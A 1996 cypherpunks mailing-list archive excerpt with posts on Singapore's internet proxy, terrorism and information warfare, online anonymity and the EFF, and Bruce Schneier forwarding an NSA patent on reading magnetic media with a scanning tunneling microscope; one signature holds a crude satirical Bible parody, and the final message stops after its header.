From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Tue, 3 Sep 1996 04:41:35 +0800
To: James Seng <jseng@pobox.org.sg>
Subject: Re: Encourage Singapore To Come Out Of the Stone Age
Message-ID: <1.5.4.32.19960902174515.0032f9cc@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 19:13 02/09/96 +1000, James Seng wrote:
>
> What i am saying is that Asian (Singapore)
>values are _DIFFERENT_ from western (America) values. [i know i
am generalising]
>
>When you look at the laws and regulation. You cannot just look at what you
>think is best. You have to look at other things. Culture, social and
>economical structure, religion and history. In every aspect, Singapore (or
>most Asian for that matter) are different. Thus, you cannot judge a
>Singapore government action based on your social background.

I've been reading some of the postings on
singapura.singnet.com.sg: quite a few people in Singapore are
pissed off that they have to go through the proxy. So, not
everyone in Singapore thinks as differently from those of us who
oppose your government's action as you would have us imagine.

Look, if the government had said, "those who wish to avoid smut
on the Net, go through this proxy, but those who do not wish our
guidance can do as they please," we would not be having this
discussion. What we have a problem with is the government trying
to *force* on everyone its own judgement on what is appropriate.

People like you in Singapore are responsible, thinking adults.
Surely you can make the choice yourself on whether you wish to
accept government guidance in this or not? 
>
>Sad to say, Singapore government does have a lot of power. But i am glad
>what you mention isnt happening in Singapore. I havent heard of any serious
>corruption cases or people accepting bribes etc. Nor does the people here
>feel a suppressed nor are there general disatifaction. I think you are too
>influenced with the persepection from 1984. *8)

In 1975, Indira Gandhi imposed a totalitarian regime in India.
The newspapers only carried news about how happy everyone was
with the controls. Lulled into complacency, Mrs. Gandhi called
elections, partly to make everyone shut up. What happened? She
was soundly defeated. Moynihan, a former US ambassador to India,
remarked, "Politicians rarely like what they read about
themselves in a free press, but it can save their skin." Or words
to that effect.

Maybe, just maybe, there is far more corruption in Singapore than
you think, but that you have no way of finding out without a free press?

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 3 Sep 1996 18:09:22 +0800
To: cypherpunks@toad.com
Subject: Re: POT_hot
Message-ID: <199609030651.XAA09953@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:39 PM 9/2/96 GMT, John Young wrote:
>   Foreign Affairs, Sep/Oct, Lead Essay: 
> 
>   "Postmodern Terrorism. The terrorism of the future may be 
>   far more destructive than terrorism as we have known it." 
>    
>   An informative survey and pot-heat by Walter Laqueur. 
> 
>      Terrorism's prospects, often overrated by the media, 
>      the public, and some politicians, are improving as its 
>      destructive potential increases. Terrorism has 
>      replaced wars between nations of the 1800s and 1900s. 
[deleted]
>      Why assassinate a politician or indiscriminately kill 
>      people when an attack on electronic switching will 
>      produce far more dramatic and lasting results? If the 
>      new terrorism directs its energies toward information 
>      warfare, its destructive power will be exponentially 
>      greater than any it wielded in the past -- greater 
>      even than it would be with biological and chemical 
>      weapons. The single successful one could claim many 
>      more victims, do more material damage, and unleash far 
>      greater panic than anything the world has yet 
>      experienced. 
>   http://jya.com/pothot.txt  (30 kb) 


<sigh>
Am I being unreasonable to expect at least a certain degreee of logic in the 
world?    Why is it that this guy (Laqueur) seems to believe that the future 
is filled with "greater panic than anything the world has yet experienced."  
I believe that, while there may be panic, it'll be panic on the part of the 
politicians, not ordinary citizens.  I suppose a certain amount of bias is 
to be expected, seeing as how it's Foreign Affairs magazine.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 3 Sep 1996 10:03:31 +0800
To: cypherpunks@toad.com
Subject: Re: FWD: Another try to kill democracy
Message-ID: <199609022352.XAA09328@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 02, 1996 21:53:42, 'SPG <spg@dds.nl>' wrote: 
 
>As student history I can name several people also labelled 'terrorist'
before  
>by a government, who were not. 'Terrorist' is the name opressive and 
>undemocratic Junta's use for their opposition. 
 
--------- 
 
>From the US journal "Foreign Affairs," Sep/Oct, 1996: 
 
   Postmodern Terrorism 
 
   Since 1900, terrorists' motivation, strategy, and weapons 
   have changed to some extent. The anarchists and the 
   left-wing terrorist groups that succeeded them, down 
   through the Red Armies that operated in Germany, Italy, 
   and Japan in the 1970s, have vanished; if anything, the 
   initiative has passed to the extreme right. 
 
   Governments and media in other countries do not 
   wish to offend terrorists by calling them terrorists. The 
   French and British press would not dream of referring to 
   their countries' native terrorists by any other name but 
   call terrorists in other nations militants, activists, 
   national liberation fighters, or even "gun persons." 
 
---------- 
 
For the full 30kb essay see:  http://jya.com/pothot.txt 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 3 Sep 1996 19:09:31 +0800
To: Stanton McCandlish <cypherpunks@toad.com
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
Message-ID: <ae512de30002100464a8@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:09 PM 9/2/96, Stanton McCandlish wrote:
>Also questionably relevant for an issue like this (more relevant perhaps
>to intellectual property issues, etc.)  The political axis most relevant
>here is civil libertarian v. authoritarian.  I don't think you'll find
>any authoritarians on the EFF board or staff.

A civil libertarian would not be speaking about limiting forms of speech to
those that are traceable. Anonymous messages are consistent with the First
Amendment. Calls for restrictions on anonymity are not consistent with a
civil liberties orientation.

(As I described in a much longer message earlier today, I can only hope
Esther Dyson simply hasn't thought enough about this issue, and about the
implications of her calls for "responsible freedom.")

--Tim May


--
[This Bible excerpt awaiting review under the U.S. Communications Decency
Act of 1996]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll
just watch!"....Later, up in the mountains, the younger daughter said:
"Dad's getting old. I say we should fuck him before he's too old to fuck."
So the two daughters got him drunk and screwed him all that night. Sure
enough, Dad got them pregnant, and had an incestuous bastard son....Onan
really hated the idea of doing his brother's wife and getting her pregnant
while his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents, your pet dog, or the farm animals, unless of course
God tells you to. [excerpts from the Old Testament, Modern Vernacular
Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 4 Sep 1996 09:24:24 +0800
To: Stanton McCandlish <stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: What is the EFF doing exactly?
Message-ID: <199609032113.OAA06380@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:53 PM 9/3/96 -0700, Stanton McCandlish wrote:
> EFF in generally does not issue extremist position 
> statements, but is careful to examine the risks as well as the benefits, 
> and look for pro-liberty solutions to those risks. 

If the right to speak anonymously is an "extremist" position in the eyes
of the EFF, then they are no friends of liberty.

It is hardly an "extremist" position outside of such countries as Cuba,
Iran, or China.

It is the overwhelmingly mainstream position, not just among netizens,
but when last heard, amongst supreme court judges and ordinary people
in the street.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Tue, 3 Sep 1996 19:17:31 +0800
To: cypherpunks@toad.com
Subject: What the NSA is patenting
Message-ID: <v03007800ae517ef65df3@[204.246.66.135]>
MIME-Version: 1.0
Content-Type: text/plain


I just spent a pleasant hour or so searching a patent database for all
patents assigned to the NSA.  There's some interesting stuff:

	"Self-locking, tamper-evident package"
	Method of retrieving documents that concern the same topic"

Fifty-Four patents total.  (Used to be they just kept stuff secret; now
they patent some of it.)  Attached is the most interesting thing I found: a
patent on techniques for reading data off overwritten magnetic media.

Bruce

********************************************************************************


United States Patent                   Patent Number:  5264794
                                       Date of Patent: 23 Nov 1993

Method of measuring magnetic fields on magnetically recorded media using
a scanning tunneling microscope and magnetic probe

Inventor(s):  Burke, Edward R., Silver Spring, MD, United States
              Mayergoyz, Isaak D., Rockville, MD, United States
              Adly, Amr A., Hyattsville, MD, United States
              Gomez, Romel D., Beltsville, MD, United States
Assignee:     The United States of America as represented by the Director,
              National Security Agency, Washington, DC, United
              States (U.S. government)
Appl. No.:    92-947693
Filed:        21 Sep 1992

Int. Cl. ............. G01R033-00; G01R033-12
Issue U.S. Cl. ....... 324/260.000; 324/212.000
Current U.S. Cl. ..... 324/260.000; 324/212.000
Field of Search ...... 324/212; 324/244; 324/260; 324/262

                            Reference Cited

                            PATENT DOCUMENTS

  Patent
  Number     Date        Class        Inventor
---------- --------- -------------- ------------
US 4232265  Apr 1980  324/260.000    Smirnov
US 4567439  Jan 1986  324/304.000    McGregor
US 4625166  Nov 1986  324/223.000    Steingroever et al.
US 4710715  Dec 1987  324/307.000    Mee et al.
US 4791368  Dec 1988  324/301.000    Tsuzuki

                            OTHER PUBLICATIONS

Magnetic Tip Sees Fine Detail, Lost Data, E. Pennisi, Feb. 29, 1992,
Science News, p. 135.

Magnetic Field Imaging by Using Magnetic Force Scanning Tunneling
Microscopy, Gomez, Burke, Adly, Mayergoyz, Feb. 17, 1992 pp. 906-908
Appl. Phy. Lett.

Tunneling-Stabilized Magnetic Force Microscopy of Bit Tracks . . . ,
Rice, Moreland, IEEE Trans. on Magnetics vol. 27 No. 3 May 1998, pp.
3452-3454.

Magnetic Force Scanning Tunneling Microscope Imaging of Overwritten
Data, Gomez, Adly, Mayergoyz, Burke, IEEE Journal of Magnetics, Sep.
1992.

Analysis of Tunneling Magnetic Force Microscopy Using a Flexible
Triangular Probe, Burke, Gomez, Adly, Mayergoyz, IEEE Journal of
Magnetics, Sep. 1992.

Magnetic Force Microscopy: General Principles and Application to . . . ,
Rugar, Mamin, et al. Journal of Appl. Phys., Aug. 1, 1990 pp. 1169-1183.

Analysis of In-Plane Bit Structure by Magentic Force Microscopy, Wadas,
Grutter, Guntherodt, J. Appl Phys. Apr. 1, 1990 pp. 3462-3467.

Theoretical Approach to Magnetic Force Microscopy, Wadas, Grutter,
American Physical Society, Jun. 1, 1989, 12,013-17.

Theory of Magnetic Imaging by Force Microscopy, Saenz, Garcia,
Slonczewski, Appl. Phys. Letters, Oct. 10, 1988 pp. 1449-1451.

Description of Magnetic Imaging in Atomic Force Microscopy, Wadas,
Journal of Magnetism and Magnetic Materials, Aug. 1989 pp. 263-268.


Art Unit - 267
Primary Examiner - Snow, Walter E.
Attorney, Agent or Firm -  Morelli, Robert D.; Maser, Thomas O.

                        ---------------------

8 Claim(s), 4 Drawing Figure(s), 4 Drawing Page(s)

                               ABSTRACT
The present invention discloses a method of measuring magnetic fields on
magnetically recorded media. The method entails replacing the metal tip
typically used with a scanning tunneling microscope with a flexible
thin-film nickel of iron magnetic probe. The present invention describes
a mathematical equation that relates probe position to magnetic field
strength. In order to establish a tunneling current between the magnetic
probe and the magnetically recorded media, any protective layer on the
magnetically recorded media is removed. The magnetic probe and the
magnetically recorded media may be coated with at least three-hundred
angstroms of gold in order to reduce spurious probe deflections due to
oxide growths on either the magnetic probe or the magnetically recorded
media. The scanning tunneling microscope is designed to maintain a
constant tunneling current between the probe and the item being scanned.
The present invention uses the scanning tunneling microscope to scan the
recording tracks of magnetically recorded media. Any change in the
magnetic field of the magnetically recorded media will cause a change in
the tunneling current. The microscope will change the position of the
probe in order to maintain a constant tunneling current. These changes
in position are recorded as an image. A mathematical equation that
relates probe position to magnetic field strength is then used to
extract the magnetic fields of the magnetically recorded media from the
recorded image of probe positions.

BACKGROUND OF THE INVENTION

1. Field of Invention

This invention relates to a method of measuring the magnetic fields of a
recorded surface and more particularly to a method of measuring the
magnetic fields of magnetically recorded information using a scanning
tunneling microscope.

2. Description of Related Art

One of the most active areas in magnetic recording technology is the
study of processes occurring at the microscopic level. In recent years,
several techniques based on scanning tunneling microscopy have been
developed to study magnetization patterns in recording media with
sub-micron resolution. These include magnetic force microscopy (MFM),
and tunneling stabilized (TS) or magnetic force scanning tunneling
microscopy (MFSTM).

In "Tunneling-stabilized Magnetic Force Microscopy of Bit Tracks on a
Hard Disk," a published article by P. Rice and J. Moreland in IEEE
Trans. Magn., vol. Mag-27, 1991, pp. 3452-3454 it was shown that
magnetic data on a hard disk can be imaged with a tunneling microscope
by using a flexible triangular probe cut from a thin film of magnetic
material.

In U.S. Pat. No. 4,791,368, entitled "Automatic Magnetic Field Measuring
Apparatus Using NMR Principles," a method of more accurately measuring
magnetic fields is described which entails surrounding the item being
measured with a coil, initially measuring the magnetic field, estimating
the magnetic resonance frequency of the item being measured, applying a
high-frequency voltage of the estimated magnetic resonance frequency,
iteratively refining the estimate of the magnetic resonance frequency
until the variation in coil inductance is a maximum, and finally, from
the resulting magnetic resonance frequency, calculating the magnetic
field of the item being measured.

In U.S. Pat. No. 4,710,715, entitled "Method Of Mapping Magnetic Field
Strength And Tipping Pulse Accuracy Of An NMR Imager," a method of
checking the homogeneity of a magnetic field by producing contour lines
of equal field strength is disclosed that utilizes a different
preparation phase for NMR imaging. The new preparation phase consists of
tipping the spins of the volume elements with a 90 degree wait 90 degree
RF pulse sequence.

In U.S. Pat. No. 4,625,166, entitled "Method For Measuring Magnetic
Potentials Using Hall Probes," a method of measuring the hysteresis
curve of a magnetic material is disclosed. The steps of the method
include subjecting the material to a magnetic field, summing the
voltages from a plurality of Hall probes that are spaced in an arc,
obtaining the magnetic flux density in the material, and deriving a
hysteresis curve of the material from the magnetic flux density and the
magnetic field intensity.

In U.S. Pat. No. 4,567,439, entitled "Apparatus For Measuring The
Magnitude Of A Magnetic Field," a method of measuring the magnitude of a
magnetic field is disclosed. The steps of the method include magnetizing
the item, inducing an oscillating magnetic field, permitting free
precession, inducing signals during free precession, and producing an
output that is proportional to the frequency deviation of the induced
signals.

In U.S. Pat. No. 4,232,265, entitled "Device For Measuring Intensity Of
Magnetic Or Electromagnetic Fields Using Strain Gauges Mounted On
Ferromagnetic Plates," a device is disclosed that measures magnetic
fields by monitoring the electrical signal produced by strain gauges
which are connected to overlapping ferromagnetic plates. The magnetic
field to be measured causes the gap between the plates to change which
in turn causes the electrical output signal from the strain gauges to
change. The magnitude of the electrical signal indicates the magnitude
of the magnetic field.

SUMMARY OF THE INVENTION

It is an object of this invention to provide a method of measuring
magnetic fields.

It is another object of this invention to provide a method of measuring
magnetic fields of magnetically recorded information.

It is another object of this invention to provide a method of measuring
magnetic fields of magnetically recorded information using a scanning
tunneling microscope.

It is another object of this invention to provide a method of measuring
magnetic fields of magnetically recorded information using a scanning
tunneling microscope that incorporates a thin-film magnetic probe that
is used to relate probe position to magnetic field strength.

These objects are achieved by using a magnetic force scanning tunneling
microscope to measure magnetic fields. This microscope, which is
typically used for recording surface topology of an item, is modified by
replacing the fine metallic tip with a flexible magnetic probe.

In the typical operation of a scanning tunneling microscope, the fine
metallic tip, which is held at a bias potential, is placed in close
proximity to the sample surface so that a tunneling current is
established between the tip and the sample surface. As the tip scans
across the surface, changes in surface topology cause the tunneling
current to change. In order to maintain a constant tunneling current,
the microscope changes the position of the tip. These changes in tip
position are recorded in a two dimensional image that reflects the
surface topology of the item scanned.

The present invention shows that by replacing the tip with a magnetic
probe and by scanning recorded media along the recording tracks, which
have no significant topological variations, the scanning tunneling
microscope can be used to record the magnetic fields of the recorded
media.

Just as surface variations caused changes in the tunneling current,
changes in magnetic field cause changes in the tunneling current. The
microscope will change the position of the probe, as it did with the
metallic tip, in order to maintain a constant tunneling current. These
position changes are recorded and, with the use of a mathematical
equation that relates probe position to magnetic field strength, are
used to measure the magnetic fields of the recorded media.

BRIEF DESCRIPTION OF THE DRAWINGS

FIG. 1 is a perspective view of a typical image created by a scanning
tunneling microscope;

FIG. 2 is a perspective view of the magnetic probe superimposed upon a
graph that indicates the critical dimensions, coordinates, and angles;

FIG. 3 is a chart showing the relationship between magnetic probe
amplitude and the angle theta; and

FIG. 4 is a chart that compares theoretically expected results of probe
amplitude versus the angle phi against experimentally obtained data of
probe amplitude versus the angle phi.

DESCRIPTION OF PREFERRED EMBODIMENTS

There is a growing interest in measuring magnetic fields created by
magnetization patterns recorded on magnetic media. Since these fields
vary over microscopic distances, various microscopic techniques have
been developed. The present invention describes a method for measuring
magnetic fields on magnetically recorded media by using a modified
scanning tunneling microscope. These magnetic fields are measured by
determining the relationship between the microscope probe movement and
magnetic field strength.

The scanning tunneling microscope operates by scanning the surface of an
object with a metal tip. The tip is biased with a dc voltage and placed
close enough to the surface of the object to establish a tunneling
current. Changes in the surface topology of the object cause a change in
the tunneling current. A feedback system in the microscope adjusts the
vertical position of the tip in order to maintain a constant tunneling
current. As the tip is scanned across the object, the changes in tip
position are recorded. These recordings reflect the surface topology of
the item scanned. An example of such an image is indicated in FIG. 1.

The present invention discloses a method for using a modified magnetic
force scanning tunneling microscope to measure magnetic fields. The
metal tip of the microscope is replaced with a thin-film magnetic probe
20 of FIG. 2. Instead of scanning the surface topology of an item, the
modified microscope is used to scan individual recording tracks of a
magnetically recorded media which do not have any significant
topological variations.

Just as was done with the metal tip, the probe 20 is placed in close
proximity with the recorded media in order to establish a tunneling
current. The probe 20 is then scanned along the recording tracks of the
magnetically recorded media. Changes in magnetic field cause a change in
the tunneling current. The microscope then changes the position of the
probe 20 in order to maintain a constant tunneling current. These
position changes are recorded and, with the use of a mathematical
equation that relates probe position to magnetic field strength, used to
measure the magnetic fields of the recorded media.

The energy of interaction between the probe 20 and the magnetic field
emanating from the sample surface was evaluated using the geometry as
shown in FIG. 2. It was assumed that the field interacts only with the
last magnetic domain (i.e., a region that is magnetized in one direction
only) at the tip of the probe 20 and that this domain is magnetized
uniformly along its length. The magnetization pattern is typically a
recorded signal with repetition in the x-direction and infinite extent
in the y-direction.

Measurements were taken with a scanning tunneling microscope operating
in a constant current mode with a maximum scan range in excess of 100
micrometers in each lateral dimension. The tunneling current is
typically 0.11 nanoamperes, at a dc bias of 2.7 volts. The scan rate is
about 1.5 lines per second. Any protective coatings on the recorded
media must be removed. Adverse effects due to surface oxides on the
probe 20 or recorded media are reduced by coating the recorded media and
the tip of the probe 20 with approximately 300 angstroms of gold. Such a
coating is typically deposited by conventional sputtering techniques.

The tunneling current changes as the probe 20 interacts with the surface
and its magnetic fields. Feedback compensates for this change and the
vertical displacement of the probe 20, .DELTA.z, is recorded as a
function of its horizontal position. Therefore, a two dimensional image,
similar to the image shown in FIG. 1, is formed that maps variations in
z as a function of lateral position, i.e., .DELTA.z(x,y). Such an image
reflects both the topological and magnetic features of the magnetically
recorded media. With the appropriate choice of probe 20 properties, it
is possible to extract the magnetic fields from this image.

The magnetic contribution to the displacement, .DELTA.z, is determined
by the forces acting on the probe 20. Several theoretical calculations
that relate recorded images using such a probe 20 with the forces on the
probe 20 have appeared in "Analysis of in-plane bit structure by
magnetic force microscopy", a published article by A. Wadas, P. Grutter,
and H. Guntherodt in J. Appl. Phys., vol. 67, 1990, p. 3462 and "Theory
of magnetic imaging by force microscopy," a published article by J.
Saenz, N. Garcia, and J. Slonczewski in Appl. Phys. Lett. 53, 1988, p.
1449. However, these calculations have not directly addressed the issue
of the dependence of image contrast and resolution on the orientation of
the probe 20 as the present invention does.

By assuming that the probe 20 is uniformly magnetized along the
direction of its length, the vertical displacement can be modeled by
considering the interaction of the surface magnetic fields with a
magnetic charge distribution at the tip of the probe 20. Flexible
magnetic probes 20 made of nickel (Ni) can be used. The probes 20 used
in the present invention were fabricated by evaporating approximately
500 nanometers of Ni onto pre-patterned substrates. These films retain
the shape of the substrate pattern when peeled away from the pattern. A
typical probe would have a thickness (t) of less than or equal to one
micrometer, a length (l) of two millimeters, and a width (w) of one
micrometer. The angle delta is typically 15 degrees. The angle theta can
vary over a range of zero degrees to pi/2 degrees. The angle phi can
vary over a range of -pi/2 to pi/2. It has been observed that these
probes 20 produce consistent images of magnetization patterns.

FIG. 1 also shows the parameters for the equations used in the present
invention. It was assumed that the recorded signal is a repetitive
pattern of wavelength lambda (.lambda.) in the x direction, with
infinite extent in the y direction.

In "Theoretical approach to magnetic force microscopy," a published
article by A. Wadas and P. Grutter in Phys. Rev. B, vol. 39, no. 16,
June 1989, pp. 12013-12017 it was shown that the energy (E) of
interaction between the field from the pattern and the last domain on
the probe tip can be expressed as

E=-.intg.H.multidot.M dV,

where H is the magnetic field from the pattern, M is the magnetization
of the domain, and V is the volume of the domain. The magnetic field can
be expressed as the gradient of a scalar potential capital phi (.PHI.),
and, if the magnetization is uniform (.gradient..multidot.M=0 is
sufficient), then the above equation for E can be rewritten as

E=.intg..gradient..multidot.(.PHI.M) dV.

This new equation for E can then be converted to a surface integral
using Gauss's theorem to obtain

E=.intg..PHI.M.multidot.dA.

This latest equation simplifies the calculation of E and the
identification of the source of the different terms. The scalar
potential will then be of the form ##EQU1## where k=2.pi.n/.lambda. and
the coefficients .PHI.n match the series solution to the particular
field pattern. Specific values of .PHI.n for various field patterns can
be found in "Theoretical approach to magnetic force microscopy," a
published article by A. Wadas and P. Grutter in Phys. Rev. B, vol. 39,
no. 16, pp 12013-12017, June 1989 and in "Analysis of in-plane bit
structure by magnetic force microscopy," a published article by A.
Wadas, P. Grutter, ad H. Gutherolt in J. Appl. Phys. 67 (7), pp.
3462-3467, 1990.

In the present invention, it was assumed that 1) the domain is
magnetized along the probe axis by shape anisotropy, 2) the domain is
much longer than .lambda. so that the limit of integration in the z
direction can be extended to infinity, and 3) the thickness of the
probe, t, is much less than the wavelength .lambda..

In "Magnetic force microscopy: General principles and application to
longitudinal recording media," a published article by D. Rugar, H.
Mamim, P. Guethner, S. Lambert, J. Stern, I. McFadyen, and T. Yogi in J.
Appl. Phys. 68 (3), 1990, pp. 1169-1183, it was shown that the last
domain on the probe was 20 micrometers in length. A domain length of
this size is typically much longer than the wavelength of patterns on
modern recording surfaces.

In calculating the energy of interaction (E), the last two equations are
used to obtain ##EQU2## The integrals were preformed so that the point
(x,z) is the coordinate of the probe tip. The first term in the
calculation of the energy of interaction is due to a magnetic charge,
Mtw, at the tip of the probe. The magnetic potential is weighted by a
sampling factor caused by the variation in the field across the width,
w, of the probe tip. The next two terms can be thought of as the
contributions from the magnetic charges on the sides of the probe,
separated from the tip by the distances x.+-..

The quantity that is measured by the tunneling microscope is the
displacement, .DELTA.z, of the probe tip. The displacement is caused by
both the surface topology and magnetic field of the recorded media. If
the probe tip is properly designed, the magnetic interaction will
predominate and the effects due to surface topology will b minimized.

If the probe is constrained to rotate in the theta (.theta.) direction,
the displacement will be given by lsin.theta..DELTA..theta., where l is
the length of the probe's 20 moment-arm. A force, F.sub.N, normal to the
probe 20 will cause a rotation in the theta (.theta.) direction such
that lF.sub.N =-K.DELTA..theta. where K is the tip torque constant. The
displacement .DELTA.z is then given by ##EQU3##

The force acting on the tip is the gradient of the energy,
F=-.gradient.E, so that .DELTA.z further becomes ##EQU4##

Using the last equation and the equation for the energy (E) of
interaction, .DELTA.z becomes ##EQU5##

These last three equations give a complete description of the
interaction between the probe and the recorded pattern. In general, the
equations are quite complicated and their usefulness is not readily
apparent. In the case where the probe lines up with the pattern (i.e.,
phi=0), so that the probe scans along the recorded information, the
equation for .DELTA.z reduces to a simple form, ##EQU6##

The first two terms give the interaction between the magnetic field and
the magnetic charge at the tip. The third term gives the effect of the
charges on the sides of the probe. The third term was written in the
integral form so that it could be expressed in terms of the magnetic
field Hz. This last equation can be used to obtain relative values of
the magnetic field components Hx and Hz. To obtain absolute values, the
probe would have to be calibrated in a known field to obtain the factor
(1**2)Mtw/K.

An alternative way to obtain the fields from the last equation is by
obtaining three images at three different values of the angle theta
(.theta.). The fields Hx and Hz can then be obtained at every point from
a linear combination of the three images. As an example, if the images
were taken at theta equal to 30, 45, and 60 degrees then Hx and Hz would
be given by the following two equations:

H.sub.x =-18.01z(30.degree.)-13.55z(60.degree.)+29.35z(45.degree.),

H.sub.z =-23.48z(30.degree.)-10.40z(60.degree.)+29.35z(45.degree.)

where ##EQU7##

If phi=0 is chosen as the angle of rotation of the probe, the angle
theta must be determined to give the best image sensitivity. For
##EQU8## the relative amplitude of the harmonics, for phi=0, will vary
with theta as ##EQU9## The amplitude will have a maximum near theta=pi/2
for both large and small values of a. Raising the elevation of the probe
to this value would cause interactions with all the domains in the probe
so a smaller value would have to be chosen. The smallest value of theta
for which the amplitude is a maximum occurs when a=1, cos(theta)=1/3,
and theta=70.5 degrees. This is still a relatively large elevation, but
as can be seen from FIG. 3, the maximum occurs over a broad range.
Adequate sensitivity can be achieved when theta is as small as 45
degrees.

Numerous experiments were performed to verify the equations given above
for .DELTA.z, C**2, and beta. Agreement between experimental data and
theory, as shown in FIG. 4, is quite good. The theoretical curve was
obtained using delta (.delta.)=15 degrees, theta=12 degrees and w=1
micrometer. Error is introduced into the experimental data if, during
rotation of the sample, a different recorded track is followed.

The method of the present invention shows how the constituent magnetic
fields from recorded magnetic patterns can be obtained using a magnetic
force scanning tunneling microscope. The sensitivity of the microscope
will vary with the orientation of the probe. Changes and modifications
in the specifically described embodiments can be carried out without
departing from the scope of the invention which is intended to be
limited only by the scope of the appended claims.

1. A method of measuring magnetic fields on magnetically recorded media
comprising the steps of: (a) replacing the fine metallic tip of a
scanning tunneling microscope with a flexible thin-film magnetic probe
in order to relate probe position to magnetic field strength; (b)
removing any protective layer from said magnetically recorded media so
that said protective layer does not impede the establishment of a
tunneling current between said magnetic probe and said magnetically
recorded media; (c) aligning said magnetic probe with a recorded track
of said magnetically recorded media at an angle of zero degrees; (d)
positioning the tip of said magnetic probe to said magnetically recorded
media at an angle in the range of zero degrees to pi/2 degrees in order
to establish said tunneling current; (e) scanning said recorded track of
said magnetically recorded media with said magnetic probe; (f) recording
changes in position of said magnetic probe during said scanning of step
(e) due to changes in the magnetic field of said magnetically recorded
media; and (g) computing the magnetic fields associated with said
recordings of step (f) by using a mathematical equation that relates the
position of said magnetic probe to the strength of the magnetic field.

2. The method of claim 1 further comprising the step of plating said
magnetic probe and said magnetically recorded media with at least
three-hundred angstroms of gold in order to reduce spurious probe
deflection due to surface oxides on either said magnetic probe or said
magnetically recorded media.

3. The method of claim 1 wherein said step of replacing the fine
metallic tip of a scanning tunneling microscope with a flexible
thin-film magnetic probe is accomplished by replacing the fine metallic
tip of said scanning tunneling microscope with a thin-film nickel probe.

4. The method of claim 1 wherein said step of replacing the fine
metallic tip of a scanning tunneling microscope with a flexible
thin-film magnetic probe is accomplished by replacing the fine metallic
tip of said scanning tunneling microscope with a thin-film iron probe.

5. A method of measuring magnetic fields on magnetically recorded media
comprising the steps of: (a) replacing the fine metallic tip of a
scanning tunneling microscope with a flexible thin-film magnetic probe
in order to relate probe position to magnetic field strength; (b)
removing any protective layer from said magnetically recorded media so
that said protective layer does not impede the establishment of a
tunneling current between said magnetic probe and said magnetically
recorded media; (c) aligning said magnetic probe with a recorded track
of said magnetically recorded media at an angle of zero degrees; (d)
positioning the tip of said magnetic probe to said magnetically recorded
media at an angle in the range of zero degrees to pi/2 degrees in order
to establish said tunneling current; (e) scanning said recorded track of
said magnetically recorded media with said magnetic probe a first time;
(f) recording changes in position of said magnetic probe during said
scanning of step (e) due to changes in the magnetic field of said
magnetically recorded media; (g) positioning the tip of said magnetic
probe to said magnetically recorded media at an angle in the range of
zero degrees to pi/2 degrees but at an angle that is different then the
angle used in step (d) in order to establish said tunneling current; (h)
scanning said recorded track of said magnetically recorded media with
said magnetic probe a second time; (i) recording changes in position of
said magnetic probe during said scanning of step (h) due to changes in
the magnetic field of said magnetically recorded media; (j) positioning
the tip of said magnetic probe to said magnetically recorded media at an
angle in the range of zero degrees to pi/2 degrees but at an angle that
is different than the angles used in step (d) and step (g) in order to
establish said tunneling current; (k) scanning said recorded track of
said magnetically recorded media with said magnetic probe a third time;
(l) recording changes in position of said magnetic probe during said
scanning of step (k) due to changes in the magnetic field of said
magnetically recorded media; (m) combining the resulting three
recordings of step (f), step (i), and step (l) linearly in order to
obtain a single record of the position changes of said magnetic probe
due to changes in the magnetic field of said magnetically recorded
media; and (n) computing the magnetic fields associated with said
combination of step (m) by using a mathematical equation that relates
the position of said magnetic probe to the strength of the magnetic
field.

6. The method of claim 5 further comprising the step of plating said
magnetic probe and said magnetically recorded media with at least
three-hundred angstroms of gold in order to reduce spurious probe
deflection due to surface oxides on either said magnetic probe or said
magnetically recorded media.

7. The method of claim 5 wherein said step of replacing the fine
metallic tip of a scanning tunneling microscope with a flexible
thin-film magnetic probe is accomplished by replacing the fine metallic
tip of said scanning tunneling microscope with a thin-film nickel probe.

8. The method of claim 5 wherein said step of replacing the fine
metallic tip of a scanning tunneling microscope with a flexible
thin-film magnetic probe is accomplished by replacing the fine metallic
tip of said scanning tunneling microscope with a thin-film iron probe.




************************************************************************
* Bruce Schneier            2,000,000,000,000,000,000,000,000,002,000,
* Counterpane Systems       000,000,000,000,000,000,002,000,000,002,293
* schneier@counterpane.com  The last prime number...alphabetically!
* (612) 823-1098            Two vigintillion, two undecillion, two
* 101 E Minnehaha Pkwy      trillion, two thousand, two hundred and
* Minneapolis, MN  55419    ninety three.
************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 3 Sep 1996 23:35:34 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
Message-ID: <199609030830.BAA20001@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


